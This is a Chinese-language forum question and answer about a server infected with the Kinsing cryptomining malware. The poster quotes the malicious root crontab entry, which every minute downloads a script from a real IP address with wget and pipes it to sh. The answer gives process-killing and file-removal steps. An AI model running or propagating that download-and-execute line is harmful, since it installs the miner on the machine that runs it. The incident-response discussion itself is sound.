所以基本上我的新服务器已经感染了加密货币挖矿恶意软件 Kinsing。尽管我遵循了所有说明这里我似乎仍然无法阻止恶意软件在我的根 crontab 中创建此行:
* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1
这实际上会用恶意项目和r01.egg文件感染我的 Scrapyd 守护进程。
目前没有产生任何活动进程,恶意软件似乎也没有活动。这可能是因为我已锁定了具有受限权限的文件,如之前链接的资源所示。
我如何才能停止 cronjob 的启动?它似乎每天至少生成两次,甚至更多。
谢谢你,
答案1
步骤1 获取PID并杀死它们
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
Step2 删除文件
rm -f /tmp/kdevtmfsi